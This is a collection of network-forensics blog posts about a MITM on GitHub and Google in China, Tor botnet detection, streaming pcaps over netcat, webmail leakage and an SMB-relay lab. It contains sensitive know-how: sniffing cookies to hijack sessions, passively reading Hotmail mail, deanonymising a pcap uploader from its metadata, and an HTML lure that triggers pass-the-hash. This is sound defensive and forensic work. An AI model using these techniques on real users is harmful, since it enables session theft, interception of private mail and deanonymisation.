It's difficult to say exactly how the MITM attack was carried out, but we can dismiss DNS spoofing as the used method. The evidence we've observed instead indicate that the MITM attack is performed either by performing IP hijacking or by simply reconfiguring a router to forward the HTTPS traffic to a transparent SSL proxy. An alternative to changing the router config would also be to add an in-line device that redirects the desired traffic to the SSL proxy. However, regardless of how they did it the attacker would be able to decrypt and inspect the traffic going to Google.

We can also conclude that the method used to perform the MITM attack was similar to the Chinese MITM on GitHub, but not identical.

Posted by Erik Hjelmvik on Thursday, 04 September 2014 23:55:00 (UTC/GMT)

Tags: #MITM #GFW #PCAP #PCAPNG #Google #SSL #TLS #China

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=14955CB


Detecting TOR Communication in Network Traffic

The anonymity network Tor is often misused by hackers and criminals in order to remotely control hacked computers. In this blog post we explain why Tor is so well suited for such malicious purposes, but also how incident responders can detect Tor traffic in their networks.

Yellow onions with cross section. Photo taken by Andrew c

The privacy network Tor (originally short for The Onion Router) is often used by activists and whistleblowers, who wish to preserve their anonymity online. Tor is also used by citizens of countries with censored Internet (like in China, Saudi Arabia and Belarus), in order to evade the online censorship and surveillance systems. Authorities in repressive regimes are therefore actively trying to detect and block Tor traffic, which makes research on Tor protocol detection a sensitive subject.

Tor is, however, not only used for good; a great deal of the traffic in the Tor networks is in fact port scans, hacking attempts, exfiltration of stolen data and other forms of online criminality. Additionally, in December last year researchers at Rapid7 revealed a botnet called “SkyNet” that used Tor for its Command-and-Control (C2) communication. Here is what they wrote about the choice of running the C2 over Tor:

"Common botnets generally host their Command & Control (C&C) infrastructure on hacked, bought or rented servers, possibly registering domains to resolve the IP addresses of their servers. This approach exposes the botnet from being taken down or hijacked. The security industry generally will try to take the C&C servers offline and/or takeover the associated domains
[...]
What the Skynet botnet creator realized, is that he could build a much stronger infrastructure at no cost just by utilizing Tor as the internal communication protocol, and by using the Hidden Services functionality that Tor provides."


Tor disguised as HTTPS

Tor doesn't just provide encryption, it is also designed to look like normal HTTPS traffic. This makes Tor channels blend in quite well with normal web surfing traffic, which makes Tor communication difficult to identify even for experienced incident responders. As an example, here is how tshark interprets a Tor session to port TCP 443:

$ tshark -nr tbot_2E1814CCCF0.218EB916.pcap | head
1 0.000000 172.16.253.130 -> 86.59.21.38 TCP 62 1565 > 443 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1
2 0.126186 86.59.21.38 -> 172.16.253.130 TCP 60 443 > 1565 [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
3 0.126212 172.16.253.130 -> 86.59.21.38 TCP 54 1565 > 443 [ACK] Seq=1 Ack=1 Win=64240 Len=0
4 0.127964 172.16.253.130 -> 86.59.21.38 SSL 256 Client Hello
5 0.128304 86.59.21.38 -> 172.16.253.130 TCP 60 443 > 1565 [ACK] Seq=1 Ack=203 Win=64240 Len=0
6 0.253035 86.59.21.38 -> 172.16.253.130 TLSv1 990 Server Hello, Certificate, Server Key Exchange, Server Hello Done
7 0.259231 172.16.253.130 -> 86.59.21.38 TLSv1 252 Client Key Exchange, Change Cipher Spec, Encrypted Handshake Message
8 0.259408 86.59.21.38 -> 172.16.253.130 TCP 60 443 > 1565 [ACK] Seq=937 Ack=401 Win=64240 Len=0
9 0.379712 86.59.21.38 -> 172.16.253.130 TLSv1 113 Change Cipher Spec, Encrypted Handshake Message
10 0.380009 172.16.253.130 -> 86.59.21.38 TLSv1 251 Encrypted Handshake Message

A Tor session to TCP port 443, decoded by tshark as if it was HTTPS

The thsark output above looks no different from when a real HTTPS session is being analyzed. So in order to detect Tor traffic one will need to apply some sort of traffic classification or application identification. However, most implementations for protocol identification rely on either port number inspection or protocol specification validation. But Tor often communicate over TCP 443 and it also follows the TLS protocol spec (RFC 2246), because of this most products for intrusion detection and deep packet inspection actually fail at identifying Tor traffic. A successful method for detecting Tor traffic is to instead utilize statistical analysis of the communication protocol in order to tell different SSL implementations apart. One of the very few tools that has support for protocol identification via statistical analysis is CapLoader.

CapLoader provides the ability to differentiate between different types of SSL traffic without relying on port numbers. This means that Tor sessions can easily be identified in a network full of HTTPS traffic.


Analyzing the tbot PCAPs from Contagio

@snowfl0w provides some nice analysis of the SkyNet botnet (a.k.a. Trojan.Tbot) at the Contagio malware dump, where she also provides PCAP files with the network traffic generated by the botnet.

The following six PCAP files are provided via Contagio:

  1. tbot_191B26BAFDF58397088C88A1B3BAC5A6.pcap (7.55 MB)
  2. tbot_23AAB9C1C462F3FDFDDD98181E963230.pcap (3.24 MB)
  3. tbot_2E1814CCCF0C3BB2CC32E0A0671C0891.pcap (4.08 MB)
  4. tbot_5375FB5E867680FFB8E72D29DB9ABBD5.pcap (5.19 MB)
  5. tbot_A0552D1BC1A4897141CFA56F75C04857.pcap (3.97 MB) [only outgoing packets]
  6. tbot_FC7C3E087789824F34A9309DA2388CE5.pcap (7.43 MB)

Unfortunately the file “tbot_A055[...]” only contains outgoing network traffic. This was likely caused by an incorrect sniffer setup, such as a misconfigured switch monitor port (aka SPAN port) or failure to capture the traffic from both monitor ports on a non-aggregating network tap (we recommend using aggregation taps in order to avoid these types of problems, see our sniffing tutorial for more details). The analysis provided here is therefore based on the other five pcap files provided by Contagio.

Here is a timeline with relative timestamps (the frame timestamps in the provided PCAP files were way of anyway, we noticed an offset of over 2 months!):

  • 0 seconds : Victim boots up and requests an IP via DHCP
  • 5 seconds : Victim perform a DNS query for time.windows.com
  • 6 seconds : Victim gets time via NTP
    ---{malware most likely gets executed here somewhere}---
  • 22 seconds : Victim performs DNS query for checkip.dyndns.org
  • 22 seconds : Victim gets its external IP via an HTTP GET request to checkip.dyndns.org
  • 23 seconds : Victim connects to the Tor network, typically on port TCP 9001 or 443
    ---{lots of Tor traffic from here on}---

This is what it looks like when one of the tbot pcap files has been loaded into CapLoader with the “Identify protocols” feature activated:
CapLoader detecting Tor protocol
CapLoader with protocol detection in action - see “TOR” in the “Sub_Protocol” column

Notice how the flows to TCP ports 80, 9101 and 443 are classified as Tor? The statistical method for protocol detection in CapLoader is so effective that CapLoader actually ignores port numbers altogether when identifying the protocol. The speed with which CapLoader parses PCAP files also enables analysis of very large capture files. A simple way to detect Tor traffic in large volumes of network traffic is therefore to load a capture file into CapLoader (with “Identify protocols” activated), sort the flows on the “Sub_Protocol” column, and scroll down to the flows classified as Tor protocol.


Beware of more Tor backdoors

Most companies and organizations allow traffic on TCP 443 to pass through their firewalls without content inspection. The privacy provided by Tor additionally makes it easy for a botnet herder to control infected machines without risking his identity to be revealed. These two factors make Tor a perfect fit for hackers and online criminals who need to control infected machines remotely.

Here is what Claudio Guarnieri says about the future use of Tor for botnets in his Rapid7 blog post:

“The most important factor is certainly the adoption of Tor as the main communication channel and the use of Hidden Services for protecting the backend infrastructure. While it’s surprising that not more botnets adopt the same design, we can likely expect more to follow the lead in the future.”

Incident responders will therefore need to learn how to detect Tor traffic in their networks, not just in order to deal with insiders or rogue users, but also in order to counter malware using it as part of their command-and-control infrastructure. However, as I've shown in this blog post, telling Tor apart from normal SSL traffic is difficult. But making use of statistical protocol detection, such as the Port Independent Protocol Identification (PIPI) feature provided with CapLoader, is in fact an effective method to detect Tor traffic in your networks.

Posted by Erik Hjelmvik on Saturday, 06 April 2013 20:55:00 (UTC/GMT)

Tags: #CapLoader #TOR #Protocol Identification #SSL #TLS #HTTPS #PCAP #PIPI

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=13400BE


Forensics of Chinese MITM on GitHub

Great Wall of China by beggs

On January 26 several users in China reported  SSL  problems while connecting to the software development site GitHub.com. The reports indicated that the Great Firewall of China (GFW) was used to perform a Man-in-the-Middle (MITM) attack against users in China who were visiting GitHub. This attack was most likely conducted in order to track which users that were reading or contributing to the list of persons behind the GFW, which is hosted on GitHub.

There is a good writetup on the attack by GreatFire.org, which says:

”At around 8pm, on January 26, reports appeared on Weibo and Twitter that users in China trying to access GitHub.com were getting warning messages about invalid SSL certificates. The evidence, listed further down in this post, indicates that this was caused by a man-in-the-middle attack.
[...]
It was very crude, in that the fake certificate was signed by an unknown authority and bound to be detected quickly. The attack stopped after about an hour.”

SSL error at github.com by bitinn
Screenshot of SSL error at github.com by @bitinn

An important part of evidence, which was used  in  the  coverage of this incident, was a packet capture file named github.pcapng that was anonymously uploaded to CloudShark.

A self-signed X.509 certificate file, named github.com.crt, was also used as evidence. It is, however, easy to extract X.509 certificates from PCAP files, so the github.com.crt file might come from the github.pcapng capture file at CloudShark.

We have no reason not to trust the reports coming from users in China, who have been victims of this MITM attack. However, in the spirit of “Trust, but verify” I decided to perform some network forensic analysis on the capture file. More specifically I set out to answer the following questions:

Q1 : Is the user a victim of a real attack rather than having staged and recorded a MITM attack set up by himself?
Q2 : Is the user located in China?
Q3 : What can we say about the technology being used for the MITM?

Time-to-Live Analysis

My first step was to load the PcapNG file from CloudShark in CapLoader:

File > Open URL > Enter:
http://www.cloudshark.org/captures/cbdd11b20a5c/download

CapLoader with github.pcapng loaded

The “Hosts” tab shows that the capture file only contained traffic between two network hosts; the user's machine and the GitHub server. I also noticed that the GitHub server (207.97.227.239) had an IP TTL of 58 and TCP Window Size of 5840. This values are a typical indication of the host being a Linux machine (see our passive OS fingerprinting blog post for more details). However, when connecting to GitHub.com from here (Sweden) the same server has an IP TTL of 128 and Window Size 64240. This looks more like a Windows machine, and is significantly different from what the Chinese user got.

It can also be noted that a TTL of 58, which the Chinese user got, would mean that the SSL connection was terminated just six router hops away from the user. However, a traceroute from ihep.ac.cn (in Beijing, China) to github.com requires a whopping 16 hops. Additionally, this traceroute hasn't even left Beijing after six hops.

traceroute to 207.97.227.239 (207.97.227.239), 30 hops max, 38 byte packets
1 gw (202.38.128.2) 0.231 ms 0.175 ms 0.178 ms
2 202.122.36.1 (202.122.36.1) 0.719 ms 0.626 ms 0.652 ms
3 192.168.1.25 (192.168.1.25) 0.509 ms 0.485 ms 0.459 ms
4 8.131 (159.226.253.77) 0.516 ms 0.488 ms 0.496 ms
5 8.198 (159.226.253.54) 11.981 ms 0.913 ms 0.829 ms
6 8.192 (159.226.254.254) 40.477 ms 40.614 ms 40.524 ms
7 Gi6-0.gw2.hkg3.asianetcom.net (203.192.137.173) 53.062 ms 40.610 ms 40.617 ms
8 te0-3-0-0.wr1.hkg0.asianetcom.net (61.14.157.249) 42.459 ms 43.133 ms 43.765 ms
9 te0-1-0-0.wr1.osa0.asianetcom.net (61.14.157.58) 76.603 ms 76.586 ms 76.648 ms
10 gi6-0-0.gw1.sjc1.asianetcom.net (61.14.157.98) 195.939 ms 195.934 ms 196.090 ms
11 ip-202-147-50-250.asianetcom.net (202.147.50.250) 180.966 ms 181.058 ms 181.339 ms
12 dcx2-edge-01.inet.qwest.net (67.14.28.70) 342.431 ms 340.882 ms 338.639 ms
13 67.133.246.158 (67.133.246.158) 253.975 ms 253.407 ms 253.742 ms
14 vlan905.core5.iad2.rackspace.net (72.4.122.10) 253.468 ms 252.947 ms 253.639 ms
15 aggr301a-1-core5.iad2.rackspace.net (72.4.122.121) 253.767 ms 253.862 ms 253.010 ms
16 github.com (207.97.227.239) 254.104 ms 253.789 ms 253.638 ms

MAC Address

NetworkMiner with PCAP file from GitHub MITM loaded

As shown in the NetworkMiner screenshot above, the Ethernet MAC address of the client's default gateway is ec:17:2f:15:23:b0, which indicates that the user's router was a device from TP-LINK. TP-LINK is a large provider of networking devices who make more than half of their sales within China. This supports the theory that the user was located in China.

PcapNG Metadata

As we've mentioned in a previous blog post, PcapNG files can contain a great deal of metadata. I therefore wrote a simple parser to extract all the juicy metadata that was available in the github.pcapng file that was anonymously uploaded to CloudShark. The metadata revealed that the user was running “64-bit Windows 7 Service Pack 1, build 7601” and sniffing with “Dumpcap 1.8.2 (SVN Rev 44520 from /trunk-1.8)”, which normally means that Wireshark 1.8.2 was being used (since it uses dumpcap for all packet capturing tasks).

The PcapNG file additionally contained a great deal of Name Resolution Blocks, i.e. cached DNS entries. Among these entries was an entry that mapped the IP 10.99.99.102 to the hostname “SHAOJU-IPAD.local”. So why was there a name resolution entry for an IP address that wasn't part of the capture file? Well, cached name resolution entries aren't properly cleaned from PcapNG files written with Wireshark 1.8.0 to 1.8.3 due to a vulnerability discovered by Laura Chappell.

So, who is “Shaoju”? Well, a Google query for shaoju github will bring you to the GitHub user Chen Shaoju, who also tweeted a screenshot of the SSL error he received when accessing GitHub.com.

SSL error received by Chen Shaoju when accessing GitHub.com

Conclusions

Q1 : Is the user a victim of a real attack rather than having staged and recorded a MITM attack set up by himself?
A1 : Yes, this is most likely a REAL attack. I'd find it unlikely that a user trying to fake such a MITM attack would use an environment with six router hops between the client and MITM machine.
Q2 : Is the user located in China?
A2 : Yes, I'm convinced that the PcapNG file was sniffed by Chen Shaoju, who lives in Wuxi, China according to his GitHub profile.
Q3 : What can we say about the technology being used for the MITM?
A3 : The fact that the MITM machine was six hops away from the user indicates that the MITM is taking place at some fairly central position in China's internet infrastructure, as opposed to being done locally at the ISP. Additionally, the machine doing the MITM seems to be running Linux and having an initial IP TTL of 64 and a TCP Window Size of 5840.


UPDATE (February 5) : Privacy / Anonymity

The fact that this blog post reveals the identity of the anonymous github.pcapng uploader seems to have caused some  reactions online.

I did, however, contact Chen Shaoju before publishing this blog post. In fact, I even sent him an email as soon as we discovered that it was possible to identify him through the capture file's metadata. Here's what I wrote:

“I'm working on a blog post about the GitHub pcap file on CloudShark. My analysis indicates that you sniffed the traffic. Is it OK with you if I publish this blog post?

If not, then I'd recommend that you remove the pcap file from couldshark in order to prevent others from identifying you via your pcap file.”
Shaoju responded the same day and said it was OK.

Once the text for the blog post was finished I also sent him a copy for verification before we published it online. Again, Shaoju responded swiftly and said that it looked good.

Also, I'm sure that Shaoju (@chenshaoju) can confirm that this blog post was published with his consent.

Finally, I'd like to add a few recommendations to users who wish to preserve their anonymity when sharing capture files:

  1. Filter out any traffic that isn't relevant to what you wish to share. CapLoader is a handy tool for selecting and filtering capture files based on flows or IP addresses.
  2. Save the capture file in the old libpcap (PCAP) format or convert your PcapNG file to PCAP format. This will remove the metadata available in Pcap-NG option fields.
  3. Anonymize frame headers, i.e Ethernet MAC addresses or even IP addresses (if needed), with a tool like: tcprewrite, Bit-Twist or TraceWrangler.

Posted by Erik Hjelmvik on Saturday, 02 February 2013 22:10:00 (UTC/GMT)

Tags: #GitHub #PcapNG #China #GFW #Forensics #MITM #SSL

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=1328C6B


Pcap-over-IP in NetworkMiner

Pcap over IP network protocol stack

Version 1.1 of NetworkMiner is soon to be released by us at Netresec. I would therefore like to give you a sneak preview of a simple yet very useful feature that we've added. We call this new feature “Pcap-over-IP”, which is a name originally coined by Packet Forensics.

With Pcap-over-IP you can have NetworkMiner read a pcap file (or libpcap formatted data in general) or over a TCP socket instead of getting it via the file system. The easiest way to send a pcap file over a TCP socket is to pipe a pcap file to netcat like this:

# cat sniffed.pcap | nc 192.168.1.20 57012

In this example I'd be running NetworkMiner on a PC with IP 192.168.1.20 and have Pcap‑over‑IP listening to TCP port 57012. NetworkMiner will save the received packets to disk as well as parse and display the contents of the packets in the GUI when receiving the Pcap‑over‑IP stream.

NetworkMiner receiving Pcap-over-IP data

Pcap-over-IP also allows me to do live network sniffing with dumpcap from my local Windows machine and pipe the captured packets to NetworkMiner via a TCP socket, using Netcat for Windows like this:

C:\Program Files\Wireshark>dumpcap -i 4 -P -w - | C:\Tools\Netcat\nc.exe 127.0.0.1 57012

Note that the “-w -” switch tells dumpcap to push the raw libpcap formated data to standard output (stdout) rather than saving it to a pcap file.

The reason for using dumcap to perform the live sniffing rather than using the built in packet capturing functionality of NetworkMiner is that dumpcap is an extremely reliably tool when it comes to capturing packets. So by sniffing with dumpcap instead of NetworkMiner you minimize the risk of dropping some packets.

I can also use Pcap-over-IP to capture network traffic from a remote PC or device. I can, for example use tcpdump to sniff traffic on the external interface of my Linux-based firewall and push it to an analyst station like this:

# tcpdump -i eth1 -s 0 -U -w - | nc 192.168.1.20 57012

I can also perform remote WiFi sniffing with dumpcap or tcpdump from a Linux machine and send the sniffed packets to NetworkMiner with netcat like this:

# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 4
# dumpcap -i wlan0 -P -w - | nc 192.168.1.20 57012

It is even possible to receive multiple PCAP streams simultaneously with NetworkMiner. This way I could have 14 dumpcap or tcpdump processes sniffing each individual IEEE 802.11 channel, while monitoring all the captured traffic in real-time with a single instance of NetworkMiner. However, note that this would require 14 sniffer computers or a single sniffer machine with 14 WiFi cards.

SSL encryption

Don't like sending your pcap files in cleartext over the network? That's just fine, we've also implemented support for SSL/TLS encryption in NetworkMiner. You can use the great multipurpose relay tool socat to read your pcap file and have it encrypted with SSL while transiting the network like this:

# socat GOPEN:sniffed.pcap SSL:192.168.1.20:57013,verify=0

You can also use socat when doing live sniffing like this:

# tcpdump -i br0 -s 0 -U -w - | socat - SSL:192.168.1.20:57013,verify=0

Warning: Always make sure you don't sniff your own Pcap-over-IP stream when sending packets to NetworkMiner. You will otherwise construct a feedback loop, which will fill up the tubes. If you need to sniff the same interface as you are using to perform the Pcap‑over‑IP transfer, then make sure to use BPF to filter out the port number used for your Pcap‑over‑IP transfer like this:

# tcpdump -i ppp0 -U -w - not port 57012 | nc 192.168.1.20 57012

UPDATE June 16, 2014

With the release of NetworkMiner 1.6 we've made the PCAP‑over‑IP functionality available in the free open source edition of NetworkMiner. We have also integrated PCAP‑over‑IP into NetworkMinerCLI, i.e. the command line version of NetworkMiner Professional.

Posted by Erik Hjelmvik on Wednesday, 07 September 2011 09:22:00 (UTC/GMT)

Tags: #Netresec #Pcap-over-IP #Pcap #tcpdump #dumpcap #TCP #SSL #TLS

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=119B126


Webmail Information Leakage

Switching protocol from unencrypted HTTP to encrypted HTTPS is a good move in order to help the users of a website to protect their privacy online. Many webmail providers have therefore started rolling out their encrypted services during the past few years. Google announced their optional “always use https” setting back in 2008 and also provided some guidance as to why it was important to use HTTPS:

Https keeps your mail encrypted as it travels between your web browser and our servers, so someone sharing your favorite coffee shop's public wifi can't read it.

It took Microsoft Hotmail until November 2010 to announce their optional support for HTTPS encryption, which users could activate by visiting https://account.live.com/ManageSSL.

Adding the option to manually turn on encryption seems to satisfy most people in the security community, probably since it enables us geeks to protect our privacy online through encryption. But the majority of the webmail users online are not aware of the risk of getting their traffic sniffed and do also not know how to turn the encryption feature on. The encryption must therefore be turned on by default in order to protect the broad mass of webmail users.

An open letter written by some well known security profiles, such as Jacob Appelbaum, Richard Clayton, Roger Dingledine, RSnake, Jeff Moss, Ronald L. Rivest and Bruce Schneier, was sent to Google in June 2009. In the letter the authors requested that Google should turn on encryption as part of the default settings:

Rather than forcing users of Gmail, Docs and Calendar to “opt-in” to adequate security, Google should make security and privacy the default.

The letter also mentioned that other competing webmail providers had even worse security since they didn't even provide any “opt-in” encryption at that time:

Google is not the only Web 2.0 firm which leaves its customers vulnerable to data theft and account hijacking. Users of Microsoft Hotmail, Yahoo Mail, Facebook and MySpace are also vulnerable to these attacks. Worst of all – these firms do not offer their customers any form of protection.

But how many of the major webmail providers do actually provide HTTPS as the default protocol today? We will in this blog post look closer at two major webmail services online: Gmail and Hotmail.

GMAIL

Just like most other webmail services Google's Gmail use HTTPS to encrypt the username and password while logging in. But Gmail now also provide encryption by default also after the user has logged in. This prevents hackers as well as investigators/analysts from extracting sent emails by sniffing network traffic.

Hackers have on the other hand been able to take over other users' logged in Gmail sessions for some time by sniffing the GX cookie and using it to fool Gmail that they are logged into the victim's user account. Google have now mitigated this issue by adding encryption and setting the GX cookie to “Secure connections only”, which means it will only be sent in HTTPS sessions.

There is, however, another cookie parameter used by Gmail that is allowed to be sent across an unencrypted HTTP session. This cookie is called “gmailchat” and is typically submitted when visiting http://mail.google.com/mail. This cookie parameter is picked up by NetworkMiner and displayed on both the Credentials tab as well as the Parameters tab.

gmailchat parameter

The client IP address, login time and Gmail account of a gmailchat cookie can be used as evidence by an analyst in order to determine which person that was using a particular computer at a particular time.

HOTMAIL

The security in Hotmail is much worse than that of Gmail. With default settings only the login is protected with encryption, everything after that is sent in cleartext HTTP. This makes it possible to extract emails sent with Hotmail just by passively sniffing the network traffic from a logged in Hotmail user. In our recent “TCP/IP Weapons School” blog post we showed how NetworkMiner displays extracted emails in the Messages tab, this feature works just as well also with Hotmail traffic. By loading a pcap with Hotmail web traffic into NetworkMiner you would get something like this:

Extracted Hotmail message

You can also use the Parameters tab to look for parameter names “fFrom”, “fTo”, “fSubject” and “fMessageBody” and thereby manually extract who sent and received the email as well as read the subject and message of the email. These parameters are all sent in an unencrypted HTTP POST to mail.live.com.

So if you're using Hotmail or Windows Live Mail, make sure to visit https://account.live.com/ManageSSL and enable the encryption functionality!

Posted by Erik Hjelmvik on Saturday, 12 February 2011 15:01:00 (UTC/GMT)

Tags: #Hotmail #SSL #HTTPS #NetworkMiner

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=112B58E


Analyzing the TCP/IP Weapons School Sample Lab

Richard Bejtlich published a sample lab from his TCP/IP Weapons School class two years ago. I haven't yet had the opportunity to take this class, but I have taken a look at the pcap file that Bejtlich included in this sample lab.

The introduction provided to this lab in the Student Workbook outlines the incident:

Samantha is back with another potential security incident. She said she received another email from her friend Samuel that resulted in suspicious computer activity. She clicked on a URL but didn’t see anything interesting. Again she wonders if her computer was "hacked".

I decided to load the pcap file into NetworkMiner to see what it can unveil.

The "Messages" tab in NetworkMiner provides quick access to the email Samantha received:

NetworkMiner Professional 1.0 Messages tab showing extracted email

The message body of the email says:

Hi Samantha,

Sorry that last link didn't work. Here is a new cool Web page!

Samuel

Attached to the email is also a file called “cool_web_page.html” (see “filename” attribute in the screenshot above). This file is already reassembled and extracted to disk by NetworkMiner when it loaded the pcap file. The easiest way to locate the file is to open the “Files” tab, sort on filename and scroll down to “cool_web_page.html”. Right-clicking the file and selecting “Open folder” causes NetworkMiner to open up the folder on the computer where the file was extracted.

Warning: it is almost never a good idea to select “Open file” in NetworkMiner, since that would cause the potentially malicious file to be executed. Only use this option if you are absolutely sure that the extracted file isn't malicious, or if you wanna perform behavioral analysis of the malicious code in a sandboxed environment.

The contents of the cool web page are:

<HTML>
<BODY>
<TITLE>Why do you open these links?!?</TITLE>
<IMG SRC="\\10.1.1.6\share2\1.jpg">
<H1>Boo!</H1>
</BODY>
</HTML>

This sure looks fishy to me, since the image tag tells the browser to load an image from an SMB network share rather than a web server. Luckily NetworkMiner parses the SMB (a.k.a. CIFS) protocol, so any file that has been transferred over SMB will show up in the files tab. No file transfer using SMB can be seen there though. The “Sessions” tab, on the other hand, confirms that there has been SMB communication between Samantha's computer (192.168.230.4) and the suspicious machine with IP 10.1.1.6.

Note: NetworkMiner displays the SMB protocol as “NetBiosSessionService”, which is the underlying protocol that provides the session layer for SMB.

NetworkMiner Professional 1.0 Sessions tab with SMB session

Interestingly enough we do not only see an SMB session from Samantha's computer to the suspicious machine, but also a second SMB session where the suspicious machine seems to connect back to Samantha's computer. This is odd, it causes me to suspect that a an SMB relay attack (MITM + pass-the-hash) could have been performed. A quick look at the credentials tab verifies this suspicion, since I can see that the exact same credentials that are sent from Samantha's computer (user account “samantha” and an HMAC) are replayed by the suspicious machine back to Samantha's computer. Hence the suspicious machine is authenticating itself to Samantha's computer by using her own credentials.

NetworkMiner Professional 1.0 Credentials tab with NTLMv2 login

This is pretty much as far as I could get by only using NetworkMiner. To see what actions the attacker did after performing the pass-the-has attack one would have to look at the network traffic on a packet level (with for example Wireshark, tshark or tcpdump). Doing so will for example reveal a failed attempt at accessing the IPC$ share on Samantha's computer.

This blog post could have ended here, but I also discovered some interesting excess information when analysing Bejtlich's TCP/IP Weapons School capture file. There were multiple SSL sessions in the pcap, most of them using the standard TCP 443 port. But the protocol identification functionality provided in NetworkMiner Professional also identified some SSL sessions going to servers on TCP ports 9001 and 8192. To me these SSL session look very much like TOR traffic. The encryption functionality in TOR is actually designed to mimic the TLS handshake of Firefox+Apache, but they use self signed certificates rather than certs signed with by a trusted CA.

NetworkMiner extracts all certificates used in the SSL handshakes to disk, so it is easy to inspect them by looking in the files tab. Just sort the files on the Protocol column and look for “TlsCertificate” in order to quickly locate the extracted certificates.

NetworkMiner Professional 1.0 Files tab with extracted TOR/SSL certificates

Posted by Erik Hjelmvik on Saturday, 15 January 2011 14:37:00 (UTC/GMT)

Tags: #Netresec #NetworkMiner #SMB #TOR #SSL

More... Share  |  Facebook   Twitter   Reddit   Hacker News Short URL: https://netresec.com/?b=11100F0

twitter

NETRESEC on Twitter

Follow @netresec on twitter:
» twitter.com/netresec


book

Recommended Books

» The Practice of Network Security Monitoring, Richard Bejtlich (2013)

» Applied Network Security Monitoring, Chris Sanders and Jason Smith (2013)

» Network Forensics, Sherri Davidoff and Jonathan Ham (2012)

» The Tao of Network Security Monitoring, Richard Bejtlich (2004)

» Practical Packet Analysis, Chris Sanders (2017)

» Windows Forensic Analysis, Harlan Carvey (2009)

» TCP/IP Illustrated, Volume 1, Kevin Fall and Richard Stevens (2011)

» Industrial Network Security, Eric D. Knapp and Joel Langill (2014)